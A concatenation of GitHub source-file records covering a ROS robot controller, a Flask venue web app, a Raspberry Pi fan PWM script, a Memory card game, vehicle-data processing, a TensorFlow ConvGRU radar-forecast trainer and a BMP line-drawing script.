data.is_right_pressed\n\n left_barrier = bumper_l | lefron\n front_barrier = lefcen | rigcen\n right_barrier = rigfron | bumper_r\n barriers = [left_barrier, front_barrier, right_barrier]\n\t#disabled rig and lef\n barriers_detected = lefron | lefcen | rigcen | rigfron | bumper_l | bumper_r\n if barriers_detected:\n self.backoff(barriers)\n 
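# arm the evasion timer: keep evading for ~3 s after the last contact,\n            # compared against time.time() on each subsequent bumper callback\n            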
self.evasion_time = time.time()+3\n elif self.evasion_time >= time.time():\n self.evasion(barriers)\n else:\n self.random_movement()\n\nif __name__ == '__main__':\n rospy.init_node('create2_motion_controller', anonymous=True)\n c = create2_motion_controller()\n c.rate.sleep()\n rospy.spin()\n","repo_name":"William-SKC/LEMUR-CoLo-Copy","sub_path":"CoLo-PE/robot_controls/create2_motion_control.py","file_name":"create2_motion_control.py","file_ext":"py","file_size_in_byte":5962,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25071341784","text":"hidden_layers_sizes = (100, 20, 8)\nactivation = 'logistic'\nsolver = 'lbfgs'\nmax_iter=2000\nalpha = 0.00000004\ntolerance = 1e-8\nrandom_state = None\n\nwidth = 50\nheight = 55\nheight_frac = 0.1\n","repo_name":"eranr/e2emlstorlets","sub_path":"e2emlstorlets/training_constants.py","file_name":"training_constants.py","file_ext":"py","file_size_in_byte":188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22659737955","text":"import unittest\n\nfrom whotracksme.data import DataSource\n\nclass TestSitesData(unittest.TestCase):\n\n def test_all_sites_have_category(self):\n sites = DataSource().sites.get_snapshot()\n no_category_sites = list(filter(lambda s: s.category == '', sites))\n self.assertEqual(no_category_sites, [])\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"whotracksme/whotracks.me","sub_path":"tests/test_sites_data.py","file_name":"test_sites_data.py","file_ext":"py","file_size_in_byte":366,"program_lang":"python","lang":"en","doc_type":"code","stars":373,"dataset":"github-code","pt":"48"} +{"seq_id":"12106217041","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\n\nfrom flask import (Blueprint, jsonify, render_template, request, flash, redirect, url_for)\nfrom forms import *\nimport sys\nfrom sqlalchemy import func\nfrom datetime import datetime\nfrom models import *\n\nvenue_page = Blueprint('venue_page', __name__, template_folder='templates')\n\n@venue_page.route('/venues')\ndef venues():\n\n data = []\n venuefilter = db.session.query(func.count(Venue.id).label('tot'), \n Venue.city,\n Venue.state\n ).group_by(Venue.city, Venue.state).all()\n \n for v in venuefilter :\n city = v.city\n state = v.state\n dic = {\"city\": city, \"state\": state, \"venues\": []}\n venuedata = db.session.query(Venue.id, Venue.name).filter(Venue.city == city).filter(Venue.state == state).all()\n for venue in venuedata :\n id = venue.id\n name = venue.name\n num = db.session.query(func.count(Shows.venue_id).label(\"tot\")).filter(Shows.venue_id == id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).one()\n num_upcoming_shows = num.tot\n dic[\"venues\"].append({\"id\": id, \"name\": name, \"num_upcoming_shows\": num_upcoming_shows})\n\n data.append(dic)\n \n return render_template('pages/venues.html', areas=data);\n\n@venue_page.route('/venues/search', methods=['POST'])\ndef search_venues():\n\n search_term = request.form.get('search_term')\n if(',' in search_term) :\n n_search = search_term.split(',')\n venues = db.session.query(Venue.id, Venue.name).filter(func.lower(Venue.city) == func.lower(n_search[0].strip())).filter(func.lower(Venue.state) == func.lower(n_search[1].strip())).all();\n else :\n venues = db.session.query(Venue.id, 
Venue.name).filter(Venue.name.ilike('%'+search_term+'%')).all();\n \n data = []\n for venue in venues:\n upcomingshows = db.session.query(func.count(Shows.venue_id).label(\"tot\")).filter(Shows.venue_id == venue.id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).one()\n data.append({\"id\": venue.id, \"name\": venue.name, \"num_upcoming_shows\": upcomingshows.tot})\n \n\n \n response = {\"count\": len(venues), \"data\": data}\n\n \n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@venue_page.route('/venues/')\ndef show_venue(venue_id):\n\n venuedata = db.session.query(Venue.id, Venue.name, Venue.genres, Venue.address, Venue.city, Venue.state, \n Venue.phone, Venue.website_link, Venue.facebook_link, Venue.seeking_talent, \n Venue.seeking_description, Venue.image_link).filter(Venue.id == venue_id).one()\n \n pastshows = db.session.query(Shows.artist_id, Shows.start_time,\n Artist.name.label(\"artist_name\"), \n Artist.image_link.label(\"artist_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.venue_id == venue_id).filter(Shows.start_time < datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n\n upcomingshows = db.session.query(Shows.artist_id, Shows.start_time,\n Artist.name.label(\"artist_name\"), \n Artist.image_link.label(\"artist_image_link\")\n ).join(Venue, Shows.venue_id == Venue.id).join(Artist, Shows.artist_id == Artist.id\n ).filter(Shows.venue_id == venue_id).filter(Shows.start_time > datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")).all()\n \n data = {\n \"id\": venuedata.id,\n \"name\": venuedata.name,\n \"genres\": venuedata.genres.replace(\"{\", \"\").replace(\"}\", \"\").split(','),\n \"address\": venuedata.address,\n \"city\": venuedata.city,\n \"state\": venuedata.state,\n \"phone\": venuedata.phone,\n \"website\": venuedata.website_link,\n \"facebook_link\": venuedata.facebook_link,\n \"seeking_talent\": venuedata.seeking_talent,\n \"seeking_description\": venuedata.seeking_description,\n \"image_link\": venuedata.image_link,\n \"past_shows_count\": len(pastshows),\n \"upcoming_shows_count\": len(upcomingshows)\n }\n\n data[\"past_shows\"] = []\n for shows in pastshows:\n psh = {\"artist_id\": shows.artist_id, \"artist_name\": shows.artist_name, \"artist_image_link\": shows.artist_image_link, \"start_time\": shows.start_time}\n data[\"past_shows\"].append(psh)\n\n data[\"upcoming_shows\"] = []\n for shows in upcomingshows:\n ush = {\"artist_id\": shows.artist_id, \"artist_name\": shows.artist_name, \"artist_image_link\": shows.artist_image_link, \"start_time\": shows.start_time}\n data[\"upcoming_shows\"].append(ush)\n \n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@venue_page.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@venue_page.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n\n form = VenueForm(request.form)\n try:\n venue = Venue()\n form.populate_obj(venue)\n db.session.add(venue)\n db.session.commit()\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n except ValueError as e:\n print(e)\n flash('An error occurred. 
Venue ' + request.form['name'] + ' could not be listed.')\n db.session.rollback()\n finally:\n db.session.close() \n\n \n return redirect(url_for('index'))\n\n@venue_page.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n\n try:\n db.session.query(Shows).filter(Shows.venue_id==venue_id).delete()\n db.session.query(Venue).filter(Venue.id==venue_id).delete()\n db.session.commit()\n except:\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n return jsonify({ 'success': True })\n\n@venue_page.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n form = VenueForm()\n venue = Venue.query.get(venue_id)\n \n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@venue_page.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n\n form = VenueForm(request.form)\n try:\n venue = Venue.query.get(venue_id)\n form.populate_obj(venue)\n db.session.commit()\n flash('Venue ' + request.form['name'] + ' was successfully updated!')\n except ValueError as e:\n print(e)\n flash('An error occurred. Venue ' + request.form['name'] + ' could not be updated.')\n db.session.rollback()\n finally:\n db.session.close() \n\n return redirect(url_for('venue_page.show_venue', venue_id=venue_id))\n\n","repo_name":"OlanSal/fyyur-webapp-project","sub_path":"controllers/venues.py","file_name":"venues.py","file_ext":"py","file_size_in_byte":6884,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17455233702","text":"#!/usr/bin/env python\n# Author: Andreas Spiess\nimport os\nimport time\nfrom time import sleep\nimport signal\nimport sys\nimport RPi.GPIO as GPIO\n\n\nfanPin = 17 # The pin ID, edit here to change it\n#batterySensPin = 18\n\ndesiredTemp = 45 # The maximum temperature in Celsius after which we trigger the fan\n\nlogFile = \"/var/log/pwm_mosfet_GPIO_17.log\" #Path to logfile\nspeedFile = \"/var/log/pwm_mosfet_GPIO_17.speed\" #Path to speed file\n\nfanSpeed=100\nsum=0\npTemp=15\niTemp=0.4\n\ndef Shutdown():\n fanOFF()\n os.system(\"sudo shutdown -h 1\")\n sleep(100)\ndef getCPUtemperature():\n res = os.popen('vcgencmd measure_temp').readline()\n temp =(res.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\"))\n #print(\"temp is {0}\".format(temp)) #Uncomment here for testing\n return temp\ndef fanOFF():\n myPWM.ChangeDutyCycle(0) # switch fan off\n return()\ndef handleFan():\n global fanSpeed,sum\n actualTemp = float(getCPUtemperature())\n diff=actualTemp-desiredTemp\n sum=sum+diff\n pDiff=diff*pTemp\n iDiff=sum*iTemp\n fanSpeed=pDiff +iDiff\n if fanSpeed>100:\n fanSpeed=100\n if fanSpeed<15:\n fanSpeed=0\n if sum>100:\n sum=100\n if sum<-100:\n sum=-100\n message=\"actualTemp %4.2f TempDiff %4.2f pDiff %4.2f iDiff %4.2f fanSpeed %5d\" % (actualTemp,diff,pDiff,iDiff,fanSpeed)\n #print message #Uncomment here for testing\n\n log = open(logFile,'w')\n log.write(message)\n\n speed = open(speedFile,'w')\n speed.write((\"{0}\".format(fanSpeed)))\n\n myPWM.ChangeDutyCycle(fanSpeed)\n return()\n#def handleBattery():\n# #print (GPIO.input(batterySensPin))\n# if GPIO.input(batterySensPin)==0:\n# (\"Shutdown()\")\n# sleep(5)\n# Shutdown()\n# return()\ndef setPin(mode): # A little redundant function but useful if you want to add logging\n GPIO.output(fanPin, mode)\n return()\ntry:\n GPIO.setwarnings(False)\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(fanPin, GPIO.OUT)\n myPWM=GPIO.PWM(fanPin,50)\n myPWM.start(50)\n# GPIO.setup(batterySensPin, GPIO.IN, pull_up_down = 
GPIO.PUD_DOWN)\n GPIO.setwarnings(False)\n fanOFF()\n while True:\n handleFan()\n# handleBattery()\n sleep(5) # Read the temperature every 5 sec, increase or decrease this limit if you want\nexcept KeyboardInterrupt: # trap a CTRL+C keyboard interrupt\n fanOFF()\n GPIO.cleanup() # resets all GPIO ports used by this program\n","repo_name":"cnaslain/pwm_mosfet_GPIO_17","sub_path":"pwm_mosfet_GPIO_17.py","file_name":"pwm_mosfet_GPIO_17.py","file_ext":"py","file_size_in_byte":2397,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"43253377341","text":"# implementation of card game - Memory\n\nimport simplegui\nimport random\n\nCARD_WIDTH = 50\nCARD_HEIGHT = 100\n#stores the card values (16 cards, 8 combinations)\nnumbers = []\nexposed = []\ncards_revealed = 0\ncards_idx_of_turn = []\nturns = 0\n\n# helper function to initialize globals\ndef new_game():\n global numbers, exposed, cards_revealed\n \n numbers = range(8)\n numbers.extend(numbers)\n random.shuffle(numbers)\n \n turns = 0\n label.set_text(\"Turns = \" + str(turns))\n cards_revealed = 0\n exposed = []\n for i in range(len(numbers)):\n exposed.append(False)\n\n# define event handlers\ndef mouseclick(pos):\n global cards_revealed, cards_idx_of_turn, turns\n \n card_idx = pos[0] / CARD_WIDTH\n \n if not exposed[card_idx]:\n if cards_revealed == 1:\n turns += 1\n label.set_text(\"Turns = \" + str(turns))\n \n if cards_revealed < 2:\n cards_revealed += 1\n \n cards_idx_of_turn.append(card_idx)\n \n else:\n #check match\n idx_card_1 = cards_idx_of_turn.pop()\n idx_card_2 = cards_idx_of_turn.pop()\n \n if not numbers[idx_card_1] == numbers[idx_card_2]:\n exposed[idx_card_1] = False\n exposed[idx_card_2] = False\n \n cards_revealed = 1\n cards_idx_of_turn.append(card_idx)\n \n exposed[card_idx] = True\n \n# cards are logically 50x100 pixels in size \ndef draw(canvas):\n for card_index in range(len(numbers)):\n x = CARD_WIDTH * card_index + 10\n y = CARD_HEIGHT / 2 + 10\n colors = ['white', 'green', 'blue', 'yellow', 'red', 'gray', 'aliceblue', 'purple', '#ddd']\n\n if card_index > 8:\n color = colors[card_index - 8]\n else:\n color = colors[card_index]\n \n line_width = 50\n \n canvas.draw_text(str(numbers[card_index]), (x, y), 50, 'white')\n \n if (exposed[card_index] == False):\n canvas.draw_line((card_index * CARD_WIDTH + CARD_WIDTH/2, 0), (card_index * CARD_WIDTH + CARD_WIDTH/2, CARD_HEIGHT), CARD_WIDTH, color)\n \n\n\n# create frame and add a button and labels\nframe = simplegui.create_frame(\"Memory\", 800, 100)\nframe.add_button(\"Reset\", new_game)\nlabel = frame.add_label(\"Turns = 0\")\n\n# register event handlers\nframe.set_mouseclick_handler(mouseclick)\nframe.set_draw_handler(draw)\n\n# get things rolling\nnew_game()\nframe.start()\n","repo_name":"studiojms/practice-python","sub_path":"memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":2522,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"5046984625","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 28 11:46:07 2019\n\n@author: tyuan\nto get data of brezil about vehicles location\n\"\"\"\nimport numpy as np\n\nimport json\n\nuni_time = list(np.load('/Users/eva/Documents/GitHub/vehicle_data_bresil/time_30.npy'))\n\nfor i in range(1,11):\n if i <10:\n name = '0'+str(i)\n else:\n name = str(i) \n fname_sub = '2014-10-'+name+'.txt'\n dic = '/Users/eva/Documents/GitHub/vehicle_data_bresil/'\n# fname_sub = 
'test.txt'\n fname = dic +fname_sub\n #with open(, 'r') as f:\n\n# s=[]\n d ={}\n x = []\n with open(fname, 'r', encoding='ascii') as f:\n for je in f.readlines():\n tm = je[:-1].split(',')\n if tm[1] in uni_time:\n# s.append has_key(tm)\n if tm[1] in d.keys():\n d[tm[1]].append(tm[4:6])\n else:\n d[tm[1]] = [tm[4:6]]\n \n x.append(tm[4:6])\n x_tem = np.array(x)\n print(min(x_tem[:,0]))\n \n print(max(x_tem[:,0]))\n \n print(min(x_tem[:,1]))\n print(max(x_tem[:,1]))\n \n \n\n# s = [j[:-1].split(',') for j in f.readlines()]\n\n \n# list_ndarray = np.array(s)\n# d={}\n## if i ==1:\n## uni_time = np.unique(list_ndarray[:,1])[0:-1:600]\n#\n# for time in uni_time:\n# d[time] = list_ndarray[list_ndarray[:,1] == time][:,4:6].tolist()\n# \n# np.save(dic+'dic'+name+'.npy',d) \n with open(dic+'dic_30'+name+'.json','w') as outfile:\n json.dump(d, outfile, ensure_ascii=False)\n# outfile.write('\\n')\n \n# \n# with open(dic+'dic'+name+'.json', 'r') as f:\n# diction = json.load(fp=f)\n\n\n","repo_name":"akshaykatyal/EdgeServerResourceAllocation","sub_path":"multiagent/multiagent/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":1716,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"31271684251","text":"import tensorflow\nimport numpy\nimport os\nimport random\nimport time\nimport cv2\n\n# data_dir='E:/SRAD2018/train'\n# data_dir='/media/zhao/新加卷/SRAD2018/train'\ndata_dir='/home/jxzhao/tianchi/SRAD2018/train'\nlog_dir='log/'\nmodel_dir='model/'\ninit_lr=0.001\ndecay_rate=0.01\nbatch_file=1\nbatch_rad=1\nbatch_size=batch_file*batch_rad\nmax_step=300000//batch_size+1\ninput_channel=1\nencode_channel1=4\nencode_channel2=8\nencode_channel3=16\nencode_channel4=32\n\ndef cnn_encode(x):\n with tensorflow.variable_scope('cnn_encode', reuse=tensorflow.AUTO_REUSE):\n encode_w1=tensorflow.get_variable('w1', [3,3,input_channel,encode_channel1], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b1=tensorflow.get_variable('b1', encode_channel1, initializer=tensorflow.constant_initializer(0))\n encode_z1=tensorflow.nn.conv2d((x-128)/128,encode_w1,[1,2,2,1],'SAME')+encode_b1\n encode_z1=tensorflow.contrib.layers.layer_norm(encode_z1,scope='ln1')\n encode_z1=tensorflow.nn.selu(encode_z1)\n\n encode_w2=tensorflow.get_variable('w2', [3,3,encode_channel1,encode_channel2], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b2=tensorflow.get_variable('b2', encode_channel2, initializer=tensorflow.constant_initializer(0))\n encode_z2=tensorflow.nn.conv2d(encode_z1,encode_w2,[1,2,2,1],'SAME')+encode_b2\n encode_z2=tensorflow.contrib.layers.layer_norm(encode_z2,scope='ln2')\n encode_z2=tensorflow.nn.selu(encode_z2)\n\n encode_w3=tensorflow.get_variable('w3', [3,3,encode_channel2,encode_channel3], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b3=tensorflow.get_variable('b3', encode_channel3, initializer=tensorflow.constant_initializer(0))\n encode_z3=tensorflow.nn.conv2d(encode_z2,encode_w3,[1,2,2,1],'SAME')+encode_b3\n encode_z3=tensorflow.contrib.layers.layer_norm(encode_z3,scope='ln3')\n encode_z3=tensorflow.nn.selu(encode_z3)\n\n encode_w4=tensorflow.get_variable('w4', [3,3,encode_channel3,encode_channel4], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n encode_b4=tensorflow.get_variable('b4', encode_channel4, initializer=tensorflow.constant_initializer(0))\n encode_z4=tensorflow.nn.conv2d(encode_z3,encode_w4,[1,2,2,1],'SAME')+encode_b4\n 
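# editor's note: four stride-2 SAME convolutions take a 501x501x1 frame down\n        # to ceil(501/16) = 32, i.e. a 32x32x32 code, matching the [batch,32,32,32]\n        # hidden state that gru_process initialises below\n        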
encode_z4=tensorflow.contrib.layers.layer_norm(encode_z4,scope='ln4')\n encode_z4=tensorflow.nn.tanh(encode_z4, name='encode_image')\n\n return encode_z4\n\ndef cnn_decode(x):\n with tensorflow.variable_scope('cnn_decode',reuse=tensorflow.AUTO_REUSE):\n decode_w1=tensorflow.get_variable('w1', [3,3,encode_channel4,encode_channel3], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b1=tensorflow.get_variable('b1', encode_channel3, initializer=tensorflow.constant_initializer(0))\n decode_z1=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(x,[63,63]),decode_w1,[1,1,1,1],'SAME')+decode_b1\n decode_z1=tensorflow.contrib.layers.layer_norm(decode_z1,scope='ln1')\n decode_z1=tensorflow.nn.selu(decode_z1)\n\n decode_w2=tensorflow.get_variable('w2', [3,3,encode_channel3,encode_channel2], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b2=tensorflow.get_variable('b2', encode_channel2, initializer=tensorflow.constant_initializer(0))\n decode_z2=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(decode_z1,[126,126]),decode_w2,[1,1,1,1],'SAME')+decode_b2\n decode_z2=tensorflow.contrib.layers.layer_norm(decode_z2,scope='ln2')\n decode_z2=tensorflow.nn.selu(decode_z2)\n\n decode_w3=tensorflow.get_variable('w3', [3,3,encode_channel2,encode_channel1], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b3=tensorflow.get_variable('b3', encode_channel1, initializer=tensorflow.constant_initializer(0))\n decode_z3=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(decode_z2,[251,251]),decode_w3,[1,1,1,1],'SAME')+decode_b3\n decode_z3=tensorflow.contrib.layers.layer_norm(decode_z3,scope='ln3')\n decode_z3=tensorflow.nn.selu(decode_z3)\n\n decode_w4=tensorflow.get_variable('w4', [3,3,encode_channel1,input_channel], initializer=tensorflow.truncated_normal_initializer(stddev=0.1))\n decode_b4=tensorflow.get_variable('b4', input_channel, initializer=tensorflow.constant_initializer(0))\n decode_z4=tensorflow.nn.conv2d(tensorflow.image.resize_nearest_neighbor(decode_z3,[501,501]),decode_w4,[1,1,1,1],'SAME')+decode_b4\n decode_z4=tensorflow.contrib.layers.layer_norm(decode_z4,scope='ln4')\n decode_z4=tensorflow.nn.tanh(decode_z4)\n decode_z4=tensorflow.clip_by_value(decode_z4*128+128,0,255,name='decode_image')\n\n return decode_z4\n\ndef convgru_encode(h_old,x):\n with tensorflow.variable_scope('convgru_encode', reuse=tensorflow.AUTO_REUSE):\n rxw=tensorflow.get_variable('rxw',[3,3,32,32])\n rhw=tensorflow.get_variable('rhw',[3,3,32,32])\n rb=tensorflow.get_variable('rb',32)\n rxw_r=tensorflow.nn.conv2d(x,rxw,[1,1,1,1],'SAME')\n rhw_r=tensorflow.nn.conv2d(h_old,rhw,[1,1,1,1],'SAME')\n r=tensorflow.nn.sigmoid(rxw_r+rhw_r+rb)\n\n uxw=tensorflow.get_variable('uxw',[3,3,32,32])\n uhw=tensorflow.get_variable('uhw',[3,3,32,32])\n ub=tensorflow.get_variable('ub',32)\n uxw_r=tensorflow.nn.conv2d(x,uxw,[1,1,1,1],'SAME')\n uhw_r=tensorflow.nn.conv2d(h_old,uhw,[1,1,1,1],'SAME')\n u=tensorflow.nn.sigmoid(uxw_r+uhw_r+ub)\n\n txw=tensorflow.get_variable('txw',[3,3,32,32])\n thw=tensorflow.get_variable('thw',[3,3,32,32])\n tb=tensorflow.get_variable('tb',32)\n txw_r=tensorflow.nn.conv2d(x,txw,[1,1,1,1],'SAME')\n thw_r=tensorflow.nn.conv2d(r*h_old,thw,[1,1,1,1],'SAME')\n t=tensorflow.nn.tanh(txw_r+thw_r+tb)\n\n h_new=(1-u)*h_old+u*t\n return h_new\n\ndef convgru_decode(h_old):\n with tensorflow.variable_scope('convgru_decode', reuse=tensorflow.AUTO_REUSE):\n rhw=tensorflow.get_variable('rhw',[3,3,32,32])\n 
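# decoder-side ConvGRU with no input frame: the r (reset) and u (update)\n        # gates below are computed from the hidden state alone, then\n        # h_new = (1-u)*h_old + u*t, mirroring convgru_encode above\n        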
rb=tensorflow.get_variable('rb',32)\n rhw_r=tensorflow.nn.conv2d(h_old,rhw,[1,1,1,1],'SAME')\n r=tensorflow.nn.sigmoid(rhw_r+rb)\n\n uhw=tensorflow.get_variable('uhw',[3,3,32,32])\n ub=tensorflow.get_variable('ub',32)\n uhw_r=tensorflow.nn.conv2d(h_old,uhw,[1,1,1,1],'SAME')\n u=tensorflow.nn.sigmoid(uhw_r+ub)\n\n thw=tensorflow.get_variable('thw',[3,3,32,32])\n tb=tensorflow.get_variable('tb',32)\n thw_r=tensorflow.nn.conv2d(r*h_old,thw,[1,1,1,1],'SAME')\n t=tensorflow.nn.tanh(thw_r+tb)\n\n h_new=(1-u)*h_old+u*t\n return h_new\n\ndef gru_process(input_code):\n all_output_encode=[]\n init_hide=numpy.zeros([batch_size,32,32,32]).astype(numpy.float32)\n for i in range(31):\n if i==0:\n output_hide=convgru_encode(init_hide,input_code[:,i,:,:,:])\n all_output_encode.append(output_hide)\n else:\n output_hide=convgru_encode(output_hide,input_code[:,i,:,:,:])\n all_output_encode.append(tensorflow.reshape(output_hide,[batch_size,1,32,32,32]))\n\n all_output_decode=[]\n for i in range(30):\n output_hide=convgru_decode(output_hide)\n all_output_decode.append(output_hide)\n\n return all_output_encode, all_output_decode\n\nlen([x.name for x in tensorflow.get_collection(tensorflow.GraphKeys.GLOBAL_VARIABLES)])\n\ntrain_image=tensorflow.placeholder(tensorflow.float32,[batch_size,31,501,501,1],name='train_image')\nanswer_image=tensorflow.placeholder(tensorflow.float32,[batch_size,30,501,501,1],name='answer_image')\nglobal_step = tensorflow.get_variable('global_step',initializer=0,trainable=False)\nlearning_rate=tensorflow.train.exponential_decay(init_lr,global_step,max_step*30,decay_rate)\nwhich_opt = tensorflow.get_variable('which_opt',initializer=0,trainable=False)\n\ncnn_encode_result=tensorflow.map_fn(cnn_encode,train_image,name='cnn_encode_result')\ngru_result=gru_process(cnn_encode_result)\npre_result=tensorflow.stack(gru_result[1],1)\ncnn_decode_result=tensorflow.map_fn(cnn_decode,pre_result,name='cnn_decode_result')\n\nloss=tensorflow.losses.mean_squared_error(answer_image[:,which_opt,:,:,:],cnn_decode_result[:,which_opt,:,:,:])\n\nminimize=tensorflow.train.AdamOptimizer(learning_rate).minimize(loss,global_step=global_step,name='minimize')\n\nSaver = tensorflow.train.Saver(max_to_keep=0,filename='cnn_convgru')\n\nSession=tensorflow.Session()\nif tensorflow.train.latest_checkpoint(model_dir):\n Saver.restore(Session,tensorflow.train.latest_checkpoint(model_dir))\nelse:\n Session.run(tensorflow.global_variables_initializer())\n\ntensorflow.summary.scalar('loss', loss)\ntensorflow.summary.image('answer_images', answer_image[0,:,:,:,:], 10)\ntensorflow.summary.image('output_images', cnn_decode_result[0], 10)\nmerge_all = tensorflow.summary.merge_all()\nFileWriter = tensorflow.summary.FileWriter(log_dir, Session.graph)\n\nfor _ in range(max_step):\n all_file=os.listdir(data_dir)\n pick_files=random.sample(all_file,batch_file)\n files=[os.path.join(data_dir,x) for x in pick_files]\n all_rad=[os.listdir(x) for x in files]\n pick_rads=[random.sample(x,batch_rad) for x in all_rad]\n rads=[[os.path.join(files[x],y) for y in pick_rads[x]] for x in range(len(files))]\n all_image_dir=[]\n for x in rads:\n for y in x:\n image_dir=[os.path.join(y,z) for z in os.listdir(y)]\n image_dir.sort()\n all_image_dir.append(image_dir)\n all_image=[]\n for x in all_image_dir:\n k1=[]\n for y in x:\n k1.append(cv2.imread(y))\n all_image.append(k1)\n all_image=numpy.array(all_image)\n try:\n for j in range(30):\n 
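# one Adam step per predicted frame: the MSE loss is defined on the single\n            # output frame selected by which_opt, fed here through feed_dict\n            # (TF1 accepts feeding a variable's value this way)\n            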
Session.run(minimize,feed_dict={train_image:all_image[:,:31,:,:,0:1],answer_image:all_image[:,31:,:,:,0:1],which_opt:j})\n if Session.run(global_step)%3000==30:\n summary = Session.run(merge_all, feed_dict={train_image:all_image[:,:31,:,:,0:1],answer_image:all_image[:,31:,:,:,0:1],which_opt:10})\n FileWriter.add_summary(summary, Session.run(global_step))\n Saver.save(Session, model_dir, global_step)\n print(Session.run(loss,feed_dict={train_image:all_image[:,:31,:,:,0:1],answer_image:all_image[:,31:,:,:,0:1]}))\n except:\n with open('log/异常数据目录.txt','a') as f:\n f.write('异常数据:%s\\n'%(rads))\n\n print(Session.run(global_step))","repo_name":"zhaojinxi/tianchi","sub_path":"全球气象AI挑战赛/cnn_convgru/cnn_convgru.py","file_name":"cnn_convgru.py","file_ext":"py","file_size_in_byte":10510,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"11666512272","text":"#line.py\n#Por Luis Diego Fernandez\n#v-1.20.20\n\nimport sys\nimport math\nimport time\nimport bmp_maker\n\n# image attributes\nwidth = 400\nheight = 400\nx_point_1 = 1\ny_point_1 = 1\nx_point_2 = 1\ny_point_2 = 1\nbits_per_pixel = 32\n\nprint(\"BMP image maker V-2\\n\")\n\nif(len(sys.argv) != 7):\n\tprint(\"Incorrect number of arguments entered\")\n\tprint(\"Enter the necessary arguments: width lenght x_point_1 y_point_1 x_point_2 y_point_2\")\n\tsys.exit()\ntry:\n\twidth = int(sys.argv[1])\n\theight = int(sys.argv[2])\n\tx_point_1 = float(sys.argv[3])\n\ty_point_1 = float(sys.argv[4])\n\tx_point_2 = float(sys.argv[5])\n\ty_point_2 = float(sys.argv[6])\n\nexcept ValueError:\n\tprint(\"Use only integer numbers\")\n\tsys.exit()\n\n\nif (width < 1):\n\twidth = 1\n\nif (height < 1):\n\theight = 1\n\nif (x_point_1 < -1 or x_point_1 > 1 or y_point_1 < -1 or y_point_1 > 1):\n\tprint(\"The point 1 is out of range\")\n\nif (x_point_2 < -1 or x_point_2 > 1 or y_point_2 < -1 or y_point_2 > 1):\n\tprint(\"The point 2 is out of range\")\n\nnewBmpImage = bmp_maker.bmpImage()\nnewBmpImage.glCreateWindow(width, height)\nnewBmpImage.glClearColor(0,0,0)\nnewBmpImage.glClear()\n\nnewBmpImage.glColor(1,1,1);\n\nnewBmpImage.glLine(x_point_1,y_point_1,x_point_2,y_point_2)\n\nnewBmpImage.glFinish()\n\nprint(\"Done\")\n","repo_name":"LuisDiego19FV/Graficas-SR2","sub_path":"line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":1228,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28431453068","text":"r\"\"\"Simple transfer learning with image modules from TensorFlow Hub.\n\nWARNING: This code is deprecated in favor of\nhttps://github.com/tensorflow/hub/tree/master/tensorflow_hub/tools/make_image_classifier\n\nThis example shows how to train an image classifier based on any\nTensorFlow Hub module that computes image feature vectors. By default,\nit uses the feature vectors computed by Inception V3 trained on ImageNet.\nFor more options, search https://tfhub.dev for image feature vector modules.\n\nThe top layer receives as input a 2048-dimensional vector (assuming\nInception V3) for each image. We train a softmax layer on top of this\nrepresentation. If the softmax layer contains N labels, this corresponds\nto learning N + 2048*N model parameters for the biases and weights.\n\nHere's an example, which assumes you have a folder containing class-named\nsubfolders, each full of images for each label. 
